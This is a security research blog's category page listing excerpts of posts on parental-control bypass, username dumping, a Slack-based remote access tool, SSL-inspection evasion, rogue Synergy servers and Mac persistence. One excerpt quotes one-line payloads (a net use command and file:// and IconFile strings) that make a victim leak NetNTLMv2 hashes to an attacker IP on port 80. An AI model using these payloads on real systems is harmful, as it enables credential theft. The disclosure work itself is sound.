Category: <span>Research</span>

Bypassing Amazon Kids+ Parental Controls

Recently for Christmas my 4 year old daughter got an Amazon Kids tablet. So far the tablet has been great and Kids+ seems like a pretty decent value for what you get. I’m very wary of the types of content available on the internet, and as a parent it’s my duty to ensure that my…


Unauthenticated Dumping of Usernames via Cisco Unified Call Manager (CUCM)

This blog is about something I found recently regarding Cisco Unified Call Manager (CUCM).  While playing around with SeeYouCM Thief, which is designed to download parse configuration files from Cisco phone systems, I noticed something interesting within a configuration file. There was an XML element in the configuration files named <secureUDSUsersAccessURL>.  The value pointed to…


The Dangers of Endpoint Discovery in VIPRE Endpoint Security

This post documents a security mis-configuation I observed in VIPRE Endpoint Security with Endpoint Discovery.  A few years ago, I published a blog post titled The Dangers of Client Probing on Palo Alto Firewalls, which detailed how client probing feature on Palo Alto firewalls can leak service account password hashes.  This issue is very similar…


Introducing Slackor, a Remote Access Tool Using Slack as a C2 Channel

As a penetration tester at Coalfire Labs, I frequently use exploitation frameworks such as Metasploit or PowerShell Empire to perform post-exploitation actions on compromised endpoints. While anti-virus (AV) bypass and detection avoidance is often trivial in all but the most mature environments, detections from AV have caused me to look toward custom tooling to mitigate…


Understanding UNC paths, SMB, and WebDAV

While browsing Twitter recently I came upon a tweet that I found to be very interesting: Did know that u can steal #NetNTLMv2 by changing #SMB port to bypass sec-things: net use \\1.2.3.4@80\tor pdf : /F (\\\\IP@80\\t)or dubdoc : ///IP@80/tor doc: Target="file://IP@80/t.dotx"or lnk: URL=file://IP@80/t.htmor: IconFile=\\IP@80\t.ico#RedTeam #NTLM cc @ddouhine — V (@mynameisv__) April 30, 2019 I…


Dark Tip: Avoiding SSL Inspection on Palo Alto Firewalls

When I stood up a Palo Alto firewall to do research for my blog post on The Dangers of Client Probing on Palo Alto Firewalls, I also found something interesting in the UI.  Under Device -> Certificate Management -> SSL Decryption Exclusion there was a list of domains that by default were exempt from SSL…


Ducky-in-the-middle: Injecting keystrokes into plaintext protocols

This was my first presentation of my talk “Ducky-in-the-Middle: Injecting Keystrokes into Plaintext Protocols”. If you want to catch this live, I’ll be presenting as Bsides Denver, NolaCon, and DEF CON: Packet Hacking Village. Update: NolaCon Presentation


Compromising Synergy clients with a rogue Synergy server

  Synergy is a type of mouse an keyboard sharing software. When configured, moving your mouse off the screen will allow you to control another system that is also set up with Synergy. Below is a YouTube video from Synergy on how it works: The way this works is one host acts as the Synergy…


Control your Mac with an iPhone app – An analysis of HippoRemote

              Applications that are in use on Macs often times are under less scrutiny for security compared to their Windows alternatives.  When researching popular apps in use on OS X I found an app on the iPhone called HippoRemote.  It appears to be quite popular, with a combined 7,558…


Using email for persistence on OS X

In this post we will cover how we can use Mail.app on OS X to persist.  I was inspired by similar tools which are designed to work with Microsoft Outlook.  I first stumbled upon this article from MWR InfoSecurity, and then this blog post from Silent Break Security.  While rules in Mail.app will not replicate…